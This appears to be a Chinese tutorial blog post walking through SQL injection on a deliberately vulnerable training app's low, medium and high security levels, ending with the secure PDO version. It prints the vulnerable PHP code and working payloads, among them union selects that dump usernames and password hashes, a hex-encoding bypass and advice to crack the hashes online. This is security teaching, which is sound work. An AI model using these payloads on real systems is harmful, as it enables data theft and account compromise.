我们已经在前面讨论过sql注入漏洞产生的原因和一些绕过waf的技巧。今天话不多说直接上测试:
首先我们先理清手工注入思路:
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据
LOW级别
必须的第一步,看源码:
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
分析源码我们可以发现,这是最不安全的代码,因为代码并未对参数id进行任何的检查过滤。
那么下面我们按照步骤进行“脱裤”:
1.判断是否能注入和注入类型
首先输入1查询成功
输入 1‘ and ‘1’=’2 查询失败
输入1‘ or ‘1234’=’1234 查询成功
说明存在字符型注入漏洞
2.猜解SQL查询语句中的字段数
输入1’order by 1#
意思是按select语句第一个字段进行排序(升序)
输入1’order by 2#
输入1’order by 3#
说明sql查询语句中只有两个字段,即First name 和 Surname。
3.确定显示的字段顺序
输入1‘ union select 1,2#
说明先显示的是First name 后是Surname。
4.获取当前数据库
输入1’ union select 1,database()
5.获取数据库中的表
输入1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
6.获取表中的字段名
7.下载数据
输入
1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#
获得加密后的密码,怎么办?解密就行了,找个在线MD5
解密网站即可。
中级
话不多说,看源码:
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
分析代码可知中级代码使用了mysqli_real_escape_string对特殊字符进行转义诸如\x00,\n,\r,,’,”,\x1a,且前端页面采用了下拉菜单,希望来限制用户单输入。但我们知道仅靠前端验证是十分不安全的,我们可以通过抓包然后修改数据,完成绕过。
1.漏洞类型判断
输入1 and 1=2
发现报错
输入1 and 1=1
成功,说明存在数字型注入漏洞。
由于接下来注入过程和上面字符型类似,所以直接上脱裤结果吧。
下载数据
输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#
另外需要注意的时查询字段名时,因为 ’被转义成\’,所以需要用16进制绕过。
高级
看源码
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
高级代码采用了LIMIT 1希望以此来控制单输出,并且查询提交页面和查询结果页面不是同一个,这样就限制了sqlmap神器的一般注入,因为sqlmap无法从查询页面获取查询结果,也就无法就行下一步的注入。
利用
对于LIMIT 1我们可以采用注释的策略,前面我的代码后面都有一个#,其实对于前面没什么用处,注释符号是用来绕过现在这种情况的,同样的只进行最后的下载数据。
输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#
安全代码
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
安全代码采用了严格的输出限制,只有当输出结果为一个时,才允许输出,并且采用了当前流行的防sql注入技术PDO技术,实现数据和代码分离,这也是我们常常强调的安全策略,同样采用token验证机制,我们在前面讨论过这个,有效防止了csrf攻击。分析到此结束,大家晚安!